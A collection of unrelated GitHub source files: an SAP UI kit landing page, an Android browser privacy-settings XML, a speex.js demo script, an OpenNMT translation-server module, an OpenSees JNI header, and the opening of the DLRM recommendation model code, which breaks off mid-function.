</p> <div class="section__container-button"> <a role="button" class="section__button" href="./images/ui-kit/Fundamental_Library_UI_Kit_V.0.10.0.zip">Download</a> </div> <h3 class="section__subtitle">What's in the UI Kit bundle?</h3> <div class="section__container"> <div class="section__item"> <img src="{{site.baseurl}}/images/ui-kit/sketch-mac-icon.png" alt="Sketch Logo" class="section__logo"/> <h3 class="section__item-title">Sketch UI Kit v0.10.0 </h3> <p class="section__text">Our Sketch file has over 30 unique, refined, and streamlined components to empower anyone using Fundamental Library with the ability to quickly and efficiently build Fiori 3 interfaces.</p> </div> <div class="section__item"> <img src="{{site.baseurl}}/images/ui-kit/typeface.png" alt="Specimen of the SAP 72 typeface" class="section__logo" /> <h3 class="section__item-title">72 Font </h3> <p class="section__text">SAP 72 font family was designed from the ground up and made it possible to meet SAP's typographic requirements, including - Legibility Enhancements, Font Styles, Brand Voice, Character Set and Language Support.</p> </div> <div class="section__item"> <img src="{{site.baseurl}}/images/ui-kit/icons-grid.png" alt="Grid of SAP icons" class="section__logo" /> <h3 class="section__item-title">Icon Font </h3> <p class="section__text">SAP icons have been created with a friendly, yet elegant style that is consistent in terms of size, stroke and balance. 
The icons are tailored for simple and direct user interaction, using metaphors that are easy to understand.</p> </div> </div> </section> <section class="section section--learn" id="learn"> <h2 class="section__title section__title--learn">Learn more</h2> <div class="section__container section__container-inner"> <div class="section__item section__item--learn section__item--img"> <div class="section__item section__item--learn section__item--learn-inner"> <h3>Blog Post</h3> <div class="blog"> <a href="https://blogs.sap.com/2020/04/10/integrating-sap-apps-from-a-ux-pov-about-fundamental-library-and-ui5-web-components/">Integrating SAP Apps from a UX POV: About Fundamental Library and UI5 Web Components</a> <span>April 10, 2020</span> <p>Integrating SAP Apps from a UX POV: About Fundamental Library and UI5 Web Components</p> </div> <img alt="blog" src="./images/ipad-example.jpg"/> <h3>Blog Post</h3> <div class="blog"> <a href="https://blogs.sap.com/2020/09/09/fundamental-library-releases-ui-kit-v0.10.0/">Fundamental Library Releases UI Kit v0.10.0</a> <span>September 9, 2020</span> </div> <h3>Blog Post</h3> <div class="blog"> <a href="https://blogs.sap.com/2020/08/23/fundamental-library-for-abap/">Fundamental Library for ABAP</a> <span>August 23, 2020</span> </div> </div> </div> <div class="section__item section__item--learn"> <div class="section__item section__item--learn section__item--learn-inner"> <a class="twitter-timeline" href="https://twitter.com/fundamental_lib?ref_src=twsrc%5Etfw">Tweets by fundamental_lib</a> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> </div> </div> <div class="section__item section__item--learn section__item--youtube"> <iframe type="text/html" width="1px" class="section__logo section__logo--learn" src="https://www.youtube.com/embed/?listType=playlist&list=PLChUxte5emJbKO8z7K68tBeXdlwi8ZFkv" frameborder="0"></iframe> </div> </div> </section> <section class="community-section" id="community"> <h2 
class="community-section__title">Community</h2> <p class="community-section__text">Join our vibrant community of developers and help drive the Fundamental Libraries forward! Take part in the conversation via our various channels.</p> <div class="community-section__container"> <div class="community-section__item"> <a href="https://github.com/SAP/fundamental-styles" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/github.png" alt="github logo" /> <span class="vh">Visit us on</span> GitHub </a> </div> <div class="community-section__item"> <a href="https://twitter.com/fundamental_lib" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/twitter.png" alt="twitter logo" /> <span class="vh">Visit us on</span> Twitter </a> </div> <div class="community-section__item"> <a href="https://ui-fundamentals.slack.com" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/slack.png" alt="slack logo" /> <span class="vh">Talk to us via</span> Slack </a> </div> <div class="community-section__item"> <a href="https://www.youtube.com/channel/UCkq8zSSBngKze-rUypz0t2w" target="_blank" class="community-section__logo"> <img src="{{site.baseurl}}/images/land-page-assets/youtube.png" alt="youtube logo" /> <span class="vh">Visit us on</span> YouTube </a> </div> </div> </section> </main> <footer class="footer-section"> <div class="footer-section__container--left"> <div class="footer-section__slogan-logo"> <span class="footer-section__slogan">THE BEST RUN</span> <img src="{{site.baseurl}}/images/land-page-assets/sap.png" alt="SAP logo" height="16" /> </div> <p class="footer-section__copyright">&copy; Copyright SAP 2020</p> </div> <div class="footer-section__container--right"> <a href="https://www.sap.com/about/legal/privacy.html" target="_blank">Privacy</a> <a href="https://www.sap.com/about/legal/impressum.html" target="_blank">Legal Disclosure</a> <a 
href="https://www.sap.com/about/legal/copyright.html" target="_blank">Copyright and Trademarks</a> <a href="https://www.sap.com/corporate/en/legal/terms-of-use.html" target="_blank">Terms of Use</a> </div> </footer> <a id="back2Top" href="#headerSection" class="backToTopHidden">&#8593;</a> <!-- <div id="responsiveMenu" class="responsive-menu"> <a href="#libraries">Libraries</a> <a href="#features">Key Features</a> <a href="#about">About</a> <a href="#community">Community</a> <a href="mailto:fundamental@sap.com" target="_blank">Send us an email</a> </div> --> <script> document.getElementById("tg-sb-content").onscroll = function() { const mainContent = document.getElementById("tg-sb-content"); if (mainContent.scrollTop > 200 ) { document.getElementById("back2Top").className = "backToTopVisible"; } else { document.getElementById("back2Top").className = "backToTopHidden"; } }; function toggleHamburger() { const toggle = document.getElementById("hamburgerToggle"); const menu = document.getElementById("responsiveMenu"); if (toggle.className === "sap-icon--menu2 header-section__sap-icon--menu2") { toggle.className = "sap-icon--decline header-section__sap-icon--decline"; menu.classList += " show"; } else { toggle.className = "sap-icon--menu2 header-section__sap-icon--menu2"; menu.classList = "header-section__links responsive-menu hide"; setTimeout(function(){ menu.classList = "responsive-menu header-section__links"; }, 500); } } </script>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <!-- Copyright (C) 2008 The Android Open Source Project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <PreferenceScreen xmlns:android="http://schemas.android.com/apk/res/android"> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_cache" android:title="@string/pref_privacy_clear_cache" android:summary="@string/pref_privacy_clear_cache_summary" android:dialogMessage="@string/pref_privacy_clear_cache_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_history" android:title="@string/pref_privacy_clear_history" android:summary="@string/pref_privacy_clear_history_summary" android:dialogMessage="@string/pref_privacy_clear_history_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> <CheckBoxPreference android:key="show_security_warnings" android:defaultValue="true" android:title="@string/pref_security_show_security_warning" android:summary="@string/pref_security_show_security_warning_summary" /> <PreferenceCategory android:title="@string/pref_privacy_cookies_title"> <CheckBoxPreference android:key="accept_cookies" android:defaultValue="true" android:title="@string/pref_security_accept_cookies" android:summary="@string/pref_security_accept_cookies_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_cookies" android:title="@string/pref_privacy_clear_cookies" android:summary="@string/pref_privacy_clear_cookies_summary" 
android:dialogMessage="@string/pref_privacy_clear_cookies_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> <PreferenceCategory android:title="@string/pref_privacy_formdata_title"> <CheckBoxPreference android:key="save_formdata" android:defaultValue="true" android:title="@string/pref_security_save_form_data" android:summary="@string/pref_security_save_form_data_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_form_data" android:title="@string/pref_privacy_clear_form_data" android:summary="@string/pref_privacy_clear_form_data_summary" android:dialogMessage="@string/pref_privacy_clear_form_data_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> <PreferenceCategory android:title="@string/pref_privacy_location_title"> <CheckBoxPreference android:key="enable_geolocation" android:defaultValue="true" android:title="@string/pref_privacy_enable_geolocation" android:summary="@string/pref_privacy_enable_geolocation_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_geolocation_access" android:dependency="enable_geolocation" android:title="@string/pref_privacy_clear_geolocation_access" android:summary="@string/pref_privacy_clear_geolocation_access_summary" android:dialogMessage="@string/pref_privacy_clear_geolocation_access_dlg" android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> <PreferenceCategory android:title="@string/pref_security_passwords_title"> <CheckBoxPreference android:key="remember_passwords" android:defaultValue="true" android:title="@string/pref_security_remember_passwords" android:summary="@string/pref_security_remember_passwords_summary" /> <com.android.browser.BrowserYesNoPreference android:key="privacy_clear_passwords" android:title="@string/pref_privacy_clear_passwords" android:summary="@string/pref_privacy_clear_passwords_summary" android:dialogMessage="@string/pref_privacy_clear_passwords_dlg" 
android:dialogIcon="@android:drawable/ic_dialog_alert"/> </PreferenceCategory> </PreferenceScreen>
{ "pile_set_name": "Github" }
(function (global) {
  // Demo page glue for speex.js: wires the file inputs, shows encode/decode
  // timings in the page, and offers the converted result as a download link.

  // --- per-stream timing readouts ---------------------------------------
  var etimes = document.querySelector("#etimes")
    , dtimes = document.querySelector("#dtimes")
    , nrsamples = document.querySelector("#nrsamples");

  // Update the streaming stats; each argument is optional (skipped if falsy).
  function printStreamTimes(e, d, nr) {
    !!e && (etimes.innerHTML = ""+e);
    !!d && (dtimes.innerHTML = ""+d);
    !!nr && (nrsamples.innerHTML = ""+nr);
  }
  global.printStreamTimes = printStreamTimes;

  // --- whole-file conversion readouts -----------------------------------
  var tdtimes = document.querySelector("#dtotaltime")
    , tetimes = document.querySelector("#etotaltime")
    , dsize = document.querySelector("#dsize")
    , esize = document.querySelector("#esize");

  // Update the file-conversion stats (sizes in bytes, times in ms);
  // each argument is optional (skipped if falsy).
  function printFileTimes(ds, es, td, te) {
    !!ds && (dsize.innerHTML = ""+ds);
    !!es && (esize.innerHTML = ""+es);
    !!td && (tdtimes.innerHTML = ""+td);
    !!te && (tetimes.innerHTML = ""+te);
  }
  global.printFileTimes = printFileTimes;

  // Append a base64 data-URI download link for `data` next to the
  // input element matched by `sel`.
  function addDownloadLink(filename, sel, data, mimetype) {
    var url = "data:"+mimetype+";base64,"+btoa(data);
    var container = document.querySelector(sel).parentElement;
    var anchor = "<br/><a download=\""+filename+"\" href=\"" + url + "\">" +
      filename + " ("+data.length/1024.0+" Kbytes)</a>";
    container.innerHTML += anchor;
  }

  // Convert the selected file: .ogg -> .wav (decode) or .wav -> .ogg (encode).
  function handleFileSelect(evt, isTypedArray) {
    var file = evt.target.files[0];
    Speex.readFile(evt, function(e) {
      // Split on the LAST dot so names like "my.recording.ogg" still work.
      var dot = file.name.lastIndexOf(".");
      var filename = dot > 0 ? file.name.substring(0, dot) : file.name
        , ext = dot > 0 ? file.name.substring(dot + 1) : "";

      var samples, sampleRate;
      if (ext === "ogg") {
        var data = e.target.result, ret, header;
        ret = Speex.decodeFile(data);
        samples = ret[0];
        header = ret[1];
        sampleRate = header.rate;

        addDownloadLink(filename+".wav", "#file_ogg", samples, "audio/wav");
        // BUGFIX: File objects expose their byte count as `size`;
        // `file.length` was always undefined.
        printFileTimes(samples.length*2, file.size,
          performance.getEntriesByName("decode")[0].duration, null);
        Speex.util.play(samples, sampleRate);
      } else if (ext === "wav") {
        var data = e.target.result;
        samples = Speex.encodeFile(data);
        addDownloadLink(filename+".ogg", "#file_wav", samples, "audio/ogg");
        printFileTimes(data.length, samples.length, 0,
          performance.getEntriesByName("encode")[0].duration);
      }
    }, isTypedArray);
  }

  document.getElementById('file_ogg').addEventListener('change', function (evt) {
    handleFileSelect(evt);
  }, false);

  document.getElementById('file_wav').addEventListener('change', function (evt) {
    handleFileSelect(evt, true);  // wav path reads the file as a typed array
  }, false);

  // Give speex.js a moment to initialize before scanning <audio> elements.
  setTimeout(function(){
    Speex.checkAudioElements();
  }, 200);
})(window);
{ "pile_set_name": "Github" }
from __future__ import print_function
import sys
import os
import argparse
import torch
import io
import time
import codecs
import json
import threading

from onmt.translate.Translator import make_translator

import onmt
import onmt.opts
import onmt.translate


class Timer:
    """Small stopwatch that records named lap times in `self.times`."""

    def __init__(self, start=False):
        self.stime = -1   # wall-clock time of the last start()
        self.prev = -1    # wall-clock time of the last tick()
        self.times = {}   # name -> elapsed seconds, filled by tick(name=...)
        if start:
            self.start()

    def start(self):
        """Reset the stopwatch and clear the recorded laps."""
        self.stime = time.time()
        self.prev = self.stime
        self.times = {}

    def tick(self, name=None, tot=False):
        """Record a lap.

        Args:
            name: optional key under which the lap is stored in `self.times`
            tot: if True, measure since start() instead of the previous tick()

        Returns:
            elapsed: (float) elapsed seconds
        """
        t = time.time()
        if not tot:
            elapsed = t - self.prev
        else:
            elapsed = t - self.stime
        self.prev = t
        if name is not None:
            self.times[name] = elapsed
        return elapsed


class ServerModelError(Exception):
    """Raised for user-facing errors (unknown model id, load failure, ...)."""
    pass


class TranslationServer():
    """Registry of ServerModel instances, keyed by integer model id."""

    def __init__(self):
        self.models = {}   # model_id -> ServerModel
        self.next_id = 0   # next auto-assigned model id

    def start(self, config_file):
        """Read the config file and pre-/load the models
        """
        self.config_file = config_file
        with open(self.config_file) as f:
            self.confs = json.load(f)

        self.models_root = self.confs.get('models_root', './available_models')
        for i, conf in enumerate(self.confs["models"]):
            if "model" not in conf:
                raise ValueError("""Incorrect config file: missing 'model' parameter for model #%d""" % i)
            kwargs = {'timeout': conf.get('timeout', None),
                      'load': conf.get('load', None),
                      'tokenizer_opt': conf.get('tokenizer', None),
                      'on_timeout': conf.get('on_timeout', None),
                      'model_root': conf.get('model_root', self.models_root)
                      }
            # Drop unset entries so ServerModel's own defaults apply.
            kwargs = {k: v for (k, v) in kwargs.items() if v is not None}
            model_id = conf.get("id", None)
            opt = conf["opt"]
            opt["model"] = conf["model"]
            self.preload_model(opt, model_id=model_id, **kwargs)

    def clone_model(self, model_id, opt, timeout=-1):
        """Clone the model `model_id` under a fresh id.

        Different options may be passed. If `opt` is None, it will use the
        same set of options as the original model.
        """
        if model_id in self.models:
            if opt is None:
                opt = self.models[model_id].user_opt
                opt["model"] = self.models[model_id].opt.model
            # BUGFIX: `timeout` must be passed by keyword -- positionally it
            # would bind to load_model's `model_id` parameter, so the clone
            # got id -1 and the timeout was silently dropped.
            return self.load_model(opt, timeout=timeout)
        else:
            raise ServerModelError("No such model '%s'" % str(model_id))

    def load_model(self, opt, model_id=None, **model_kwargs):
        """Load a model given a set of options.

        Returns:
            model_id: (int) id of the loaded model
            load_time: (float) seconds spent loading it
        """
        model_id = self.preload_model(opt, model_id=model_id, **model_kwargs)
        load_time = self.models[model_id].load_time
        return model_id, load_time

    def preload_model(self, opt, model_id=None, **model_kwargs):
        """Register a model in the internal datastructure.

        It will effectively load the model only if `load` is set in
        `model_kwargs`. Returns the (possibly auto-assigned) model id.
        """
        if model_id is not None:
            if model_id in self.models.keys():
                raise ValueError("Model ID %d already exists" % model_id)
        else:
            # Auto-assign the next free integer id.
            model_id = self.next_id
            while model_id in self.models.keys():
                model_id += 1
            self.next_id = model_id + 1
        print("Pre-loading model %d" % model_id)
        model = ServerModel(opt, model_id, **model_kwargs)
        self.models[model_id] = model
        return model_id

    def run(self, inputs):
        """Translate `inputs`.

        We keep the same format as the Lua version, i.e.
        [{"id": model_id, "src": "sequence to translate"}, { ... }]
        and use inputs[0]["id"] as the model id.
        """
        model_id = inputs[0].get("id", 0)
        if model_id in self.models and self.models[model_id] is not None:
            return self.models[model_id].run(inputs)
        else:
            print("Error No such model '%s'" % str(model_id))
            raise ServerModelError("No such model '%s'" % str(model_id))

    def unload_model(self, model_id):
        """Manually unload a model.

        It will free the memory and cancel the unload timer.
        """
        if model_id in self.models and self.models[model_id] is not None:
            self.models[model_id].unload()
        else:
            raise ServerModelError("No such model '%s'" % str(model_id))

    def list_models(self):
        """Return the list of available models as serializable dicts."""
        models = []
        for i, model in self.models.items():
            models += [model.to_dict()]
        return models


class ServerModel:
    def __init__(self, opt, model_id, tokenizer_opt=None, load=False,
                 timeout=-1, on_timeout="to_cpu", model_root="./"):
        """
        Args:
            opt: (dict) options for the Translator
            model_id: (int) model id
            tokenizer_opt: (dict) options for the tokenizer or None
            load: (bool) whether to load the model during __init__
            timeout: (int) seconds before running `do_timeout`
                     Negative values means no timeout
            on_timeout: (str) in ["to_cpu", "unload"] set what to do on
                        timeout (see function `do_timeout`)
            model_root: (str) path to the model directory;
                        it must contain the model and tokenizer file
        """
        self.model_root = model_root
        self.opt = self.parse_opt(opt)
        if self.opt.n_best > 1:
            raise ValueError("Values of n_best > 1 are not supported")
        self.model_id = model_id
        self.tokenizer_opt = tokenizer_opt
        self.timeout = timeout
        self.on_timeout = on_timeout
        self.unload_timer = None
        self.user_opt = opt
        self.tokenizer = None
        if load:
            self.load()

    def parse_opt(self, opt):
        """Parse the option set passed by the user using `onmt.opts`.

        Args:
            opt: (dict) options passed by the user

        Returns:
            opt: (Namespace) full set of options for the Translator
        """
        # Temporarily rewrite sys.argv so argparse sees the user options.
        # NOTE(review): str(v) turns booleans into 'True'/'False' strings;
        # boolean flags in `opt` may not round-trip as expected -- confirm.
        prec_argv = sys.argv
        sys.argv = sys.argv[:1]
        parser = argparse.ArgumentParser()
        onmt.opts.translate_opts(parser)
        opt['model'] = os.path.join(self.model_root, opt['model'])
        opt['src'] = "dummy_src"
        for (k, v) in opt.items():
            sys.argv += ['-%s' % k, str(v)]
        opt = parser.parse_args()
        opt.cuda = opt.gpu > -1
        sys.argv = prec_argv
        return opt

    @property
    def loaded(self):
        # The translator attribute only exists after a successful load().
        return hasattr(self, 'translator')

    def load(self):
        """Build the Translator (and optional tokenizer); records load_time."""
        timer = Timer()
        print("Loading model %d" % self.model_id)
        timer.start()
        self.out_file = io.StringIO()
        try:
            self.translator = make_translator(self.opt, report_score=False,
                                              out_file=self.out_file)
        except RuntimeError as e:
            raise ServerModelError("Runtime Error: %s" % str(e))
        timer.tick("model_loading")
        if self.tokenizer_opt is not None:
            print("Loading tokenizer")
            mandatory = ["type", "model"]
            for m in mandatory:
                if m not in self.tokenizer_opt:
                    raise ValueError("Missing mandatory tokenizer option '%s'" % m)
            if self.tokenizer_opt['type'] == 'sentencepiece':
                import sentencepiece as spm
                sp = spm.SentencePieceProcessor()
                model_path = os.path.join(self.model_root,
                                          self.tokenizer_opt['model'])
                sp.Load(model_path)
                self.tokenizer = sp
            else:
                raise ValueError("Invalid value for tokenizer type")
        self.load_time = timer.tick()
        self.reset_unload_timer()

    def run(self, inputs):
        """Translate `inputs` using this model.

        Args:
            inputs: [{"src": "..."}, {"src": ...}]

        Returns:
            results: (list) translations
            avg_scores: (list) length-weighted average score per input
            n_best: (int) self.opt.n_best
            times: (dict) timing breakdown per phase
        """
        timer = Timer()
        print("\nRunning translation using %d" % self.model_id)
        timer.start()
        if not self.loaded:
            self.load()
            timer.tick(name="load")
        elif self.opt.cuda:
            self.to_gpu()
            timer.tick(name="to_gpu")
        # NOTE: the translator expects a filepath as parameter,
        # therefore we write the data as a temp file.
        tmp_root = "/tmp/onmt_server"
        if not os.path.exists(tmp_root):
            os.makedirs(tmp_root)
        src_path = os.path.join(tmp_root, "tmp_src")
        with codecs.open(src_path, 'w', 'utf-8') as f:
            # NOTE: If an input contains a line separator \n we split it
            # into subsegments that we translate independently;
            # we then merge the translations together with the same
            # line breaks.
            subsegment = {}   # input index -> slice into the flat line list
            sscount = 0       # running count of flat lines written
            sslength = []     # token length of each flat line (for weighting)
            for (i, inp) in enumerate(inputs):
                src = inp['src']
                lines = src.split("\n")
                subsegment[i] = slice(sscount, sscount + len(lines))
                sscount += len(lines)
                for line in lines:
                    tok = self.maybe_tokenize(line)
                    f.write(tok + "\n")
                    sslength += [len(tok.split())]
        timer.tick(name="writing")
        try:
            scores = self.translator.translate(None, src_path, None,
                                               self.opt.batch_size)
        except RuntimeError as e:
            raise ServerModelError("Runtime Error: %s" % str(e))
        timer.tick(name="translation")
        print("""Using model #%d\t%d inputs (%d subsegment) \ttranslation time: %f""" % (self.model_id, len(subsegment), sscount, timer.times['translation']))
        self.reset_unload_timer()
        results = self.out_file.getvalue().split("\n")
        print("Results: ", len(results))
        # Re-join each input's subsegments, skipping empty trailing lines.
        results = ['\n'.join([self.maybe_detokenize(_)
                              for _ in results[subsegment[i]]
                              if len(_) > 0])
                   for i in sorted(subsegment.keys())]
        # Length-weighted average of the per-line scores for each input.
        avg_scores = [sum([s * l for s, l in zip(scores[sub], sslength[sub])])
                      / sum(sslength[sub])
                      for k, sub in sorted(subsegment.items(),
                                           key=lambda x: x[0])]
        self.clear_out_file()
        return results, avg_scores, self.opt.n_best, timer.times

    def do_timeout(self):
        """Timeout callback that frees GPU memory by moving the model to
        CPU or unloading it, depending on the `self.on_timeout` value.
        """
        if self.on_timeout == "unload":
            print("Timeout: unloading model %d" % self.model_id)
            self.unload()
        if self.on_timeout == "to_cpu":
            print("Timeout: sending model %d to CPU" % self.model_id)
            self.to_cpu()

    def unload(self):
        """Drop the translator and release cached CUDA memory."""
        print("Unloading model %d" % self.model_id)
        del self.translator
        if self.opt.cuda:
            torch.cuda.empty_cache()
        self.unload_timer = None
def reset_unload_timer(self):
    """(Re)arm the inactivity countdown that triggers `do_timeout`.

    A negative `self.timeout` disables the mechanism entirely.
    """
    if self.timeout < 0:
        return
    if self.unload_timer is not None:
        self.unload_timer.cancel()
    countdown = threading.Timer(self.timeout, self.do_timeout)
    self.unload_timer = countdown
    countdown.start()

def to_dict(self):
    """Serialize this model's public configuration into a plain dict."""
    hidden = ["model", "src"]
    visible_opt = {key: self.user_opt[key]
                   for key in self.user_opt.keys()
                   if key not in hidden}
    description = {
        "model_id": self.model_id,
        "opt": visible_opt,
        "model": self.user_opt["model"],
        "loaded": self.loaded,
        "timeout": self.timeout,
    }
    if self.tokenizer_opt is not None:
        description["tokenizer"] = self.tokenizer_opt
    return description

def to_cpu(self):
    """Move the model to CPU and clear CUDA cache"""
    self.translator.model.cpu()
    if self.opt.cuda:
        torch.cuda.empty_cache()

def to_gpu(self):
    """Move the model to GPU"""
    torch.cuda.set_device(self.opt.gpu)
    self.translator.model.cuda()

def clear_out_file(self):
    """Swap in a fresh capture buffer (creating a new object is faster)."""
    fresh = io.StringIO()
    self.out_file = fresh
    self.translator.out_file = fresh

def maybe_tokenize(self, sequence):
    """Tokenize `sequence` when a tokenizer is configured, else pass through."""
    if self.tokenizer_opt is None:
        return sequence
    return self.tokenize(sequence)

def tokenize(self, sequence):
    """Tokenize a single sequence with the loaded tokenizer.

    Args:
        sequence: (str) the sequence to tokenize
    Returns:
        tok: (str) the space-joined tokenized sequence
    Raises:
        ValueError: when no tokenizer has been loaded
    """
    if self.tokenizer is None:
        raise ValueError("No tokenizer loaded")
    if self.tokenizer_opt["type"] == "sentencepiece":
        pieces = self.tokenizer.EncodeAsPieces(sequence)
        tok = " ".join(pieces)
    return tok

def maybe_detokenize(self, sequence):
    """De-tokenize `sequence` when a tokenizer is configured, else pass through."""
    if self.tokenizer_opt is None:
        return sequence
    return self.detokenize(sequence)

def detokenize(self, sequence):
    """Reassemble a space-tokenized sequence into plain text.

    Raises:
        ValueError: when no tokenizer has been loaded
    """
    if self.tokenizer is None:
        raise ValueError("No tokenizer loaded")
    if self.tokenizer_opt["type"] == "sentencepiece":
        pieces = sequence.split()
        detok = self.tokenizer.DecodePieces(pieces)
    return detok
{ "pile_set_name": "Github" }
/* ****************************************************************** ** ** OpenSees - Open System for Earthquake Engineering Simulation ** ** Pacific Earthquake Engineering Research Center ** ** ** ** ** ** (C) Copyright 1999, The Regents of the University of California ** ** All Rights Reserved. ** ** ** ** Commercial use of this program without express permission of the ** ** University of California, Berkeley, is strictly prohibited. See ** ** file 'COPYRIGHT' in main directory for information on usage and ** ** redistribution, and for a DISCLAIMER OF ALL WARRANTIES. ** ** ** ** Developed by: ** ** Frank McKenna (fmckenna@ce.berkeley.edu) ** ** Gregory L. Fenves (fenves@ce.berkeley.edu) ** ** ** ** ****************************************************************** */ // $Revision: 1.1 $ // $Date: 2007-04-06 03:43:53 $ // $Source: /usr/local/cvs/OpenSees/SRC/java/OpenSeesEvaluator.h,v $ // // Written: fmk // Created: 07/04 // #include <jni.h> /* Header for class OpenSeesEvaluator */ #ifndef _Included_OpenSeesEvaluator #define _Included_OpenSeesEvaluator #ifdef __cplusplus extern "C" { #endif /* * Class: OpenSeesEvaluator * Method: openSeesInit * Signature: ()I */ JNIEXPORT jint JNICALL Java_OpenSeesEvaluator_openSeesInit (JNIEnv *, jobject); /* * Class: OpenSeesEvaluator * Method: openSeesEval * Signature: (Ljava/lang/String;I)Ljava/lang/String; */ JNIEXPORT jstring JNICALL Java_OpenSeesEvaluator_openSeesEval (JNIEnv *, jobject, jstring, jint); /* * Class: OpenSeesEvaluator * Method: openSeesQuit * Signature: ()I */ JNIEXPORT jint JNICALL Java_OpenSeesEvaluator_openSeesQuit (JNIEnv *, jobject); #ifdef __cplusplus } #endif #endif
{ "pile_set_name": "Github" }
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. # # Description: an implementation of a deep learning recommendation model (DLRM) # The model input consists of dense and sparse features. The former is a vector # of floating point values. The latter is a list of sparse indices into # embedding tables, which consist of vectors of floating point values. # The selected vectors are passed to mlp networks denoted by triangles, # in some cases the vectors are interacted through operators (Ops). # # output: # vector of values # model: | # /\ # /__\ # | # _____________________> Op <___________________ # / | \ # /\ /\ /\ # /__\ /__\ ... /__\ # | | | # | Op Op # | ____/__\_____ ____/__\____ # | |_Emb_|____|__| ... |_Emb_|__|___| # input: # [ dense features ] [sparse indices] , ..., [sparse indices] # # More precise definition of model layers: # 1) fully connected layers of an mlp # z = f(y) # y = Wx + b # # 2) embedding lookup (for a list of sparse indices p=[p1,...,pk]) # z = Op(e1,...,ek) # obtain vectors e1=E[:,p1], ..., ek=E[:,pk] # # 3) Operator Op can be one of the following # Sum(e1,...,ek) = e1 + ... + ek # Dot(e1,...,ek) = [e1'e1, ..., e1'ek, ..., ek'e1, ..., ek'ek] # Cat(e1,...,ek) = [e1', ..., ek']' # where ' denotes transpose operation # # References: # [1] Maxim Naumov, Dheevatsa Mudigere, Hao-Jun Michael Shi, Jianyu Huang, # Narayanan Sundaram, Jongsoo Park, Xiaodong Wang, Udit Gupta, Carole-Jean Wu, # Alisson G. 
# Azzolini, Dmytro Dzhulgakov, Andrey Mallevich, Ilia Cherniavskii,
# Yinghai Lu, Raghuraman Krishnamoorthi, Ansha Yu, Volodymyr Kondratenko,
# Stephanie Pereira, Xianjie Chen, Wenlin Chen, Vijay Rao, Bill Jia, Liang Xiong,
# Misha Smelyanskiy, "Deep Learning Recommendation Model for Personalization and
# Recommendation Systems", CoRR, arXiv:1906.00091, 2019

from __future__ import absolute_import, division, print_function, unicode_literals

# miscellaneous
import builtins
import functools
# import bisect
# import shutil
import time
import json
# data generation
from . import dlrm_data_pytorch as dp

# numpy
import numpy as np

# onnx
# The onnx import causes deprecation warnings every time workers
# are spawned during testing. So, we filter out those warnings.
import warnings
with warnings.catch_warnings():
    warnings.filterwarnings("ignore", category=DeprecationWarning)
    import onnx

# pytorch
import torch
import torch.nn as nn
from torch.nn.parallel.parallel_apply import parallel_apply
from torch.nn.parallel.replicate import replicate
from torch.nn.parallel.scatter_gather import gather, scatter
# quotient-remainder trick
from .tricks.qr_embedding_bag import QREmbeddingBag
# mixed-dimension trick
from .tricks.md_embedding_bag import PrEmbeddingBag, md_solver

import sklearn.metrics

# from torchviz import make_dot
# import torch.nn.functional as Functional
# from torch.nn.parameter import Parameter

from torch.optim.lr_scheduler import _LRScheduler

exc = getattr(builtins, "IOError", "FileNotFoundError")


class LRPolicyScheduler(_LRScheduler):
    # Warmup -> (optional) polynomial decay -> frozen learning-rate policy.
    # NOTE(review): methods below call sys.exit(), but `import sys` only
    # happens inside the __main__ block of this file -- confirm `sys` is in
    # scope when this class is used from another module.
    def __init__(self, optimizer, num_warmup_steps, decay_start_step,
                 num_decay_steps):
        self.num_warmup_steps = num_warmup_steps
        self.decay_start_step = decay_start_step
        self.decay_end_step = decay_start_step + num_decay_steps
        self.num_decay_steps = num_decay_steps

        if self.decay_start_step < self.num_warmup_steps:
            sys.exit("Learning rate warmup must finish before the decay starts")

        super(LRPolicyScheduler, self).__init__(optimizer)

    def get_lr(self):
        # Return one lr per param group for the current _step_count.
        step_count = self._step_count
        if step_count < self.num_warmup_steps:
            # warmup
            scale = 1.0 - (self.num_warmup_steps - step_count) / self.num_warmup_steps
            lr = [base_lr * scale for base_lr in self.base_lrs]
            self.last_lr = lr
        elif self.decay_start_step <= step_count and step_count < self.decay_end_step:
            # decay
            decayed_steps = step_count - self.decay_start_step
            scale = ((self.num_decay_steps - decayed_steps) / self.num_decay_steps) ** 2
            min_lr = 0.0000001
            lr = [max(min_lr, base_lr * scale) for base_lr in self.base_lrs]
            self.last_lr = lr
        else:
            if self.num_decay_steps > 0:
                # freeze at last, either because we're after decay
                # or because we're between warmup and decay
                # NOTE(review): self.last_lr is only set by the two branches
                # above; if the first call already lands here it is undefined
                # -- confirm intended step ranges
                lr = self.last_lr
            else:
                # do not adjust
                lr = self.base_lrs
        return lr


### define dlrm in PyTorch ###
class DLRM_Net(nn.Module):
    def create_mlp(self, ln, sigmoid_layer):
        """Build an MLP from layer sizes `ln` (numpy array); the layer at
        index `sigmoid_layer` gets a Sigmoid activation, all others ReLU."""
        # build MLP layer by layer
        layers = nn.ModuleList()
        for i in range(0, ln.size - 1):
            n = ln[i]
            m = ln[i + 1]

            # construct fully connected operator
            LL = nn.Linear(int(n), int(m), bias=True)

            # initialize the weights
            # with torch.no_grad():
            # custom Xavier input, output or two-sided fill
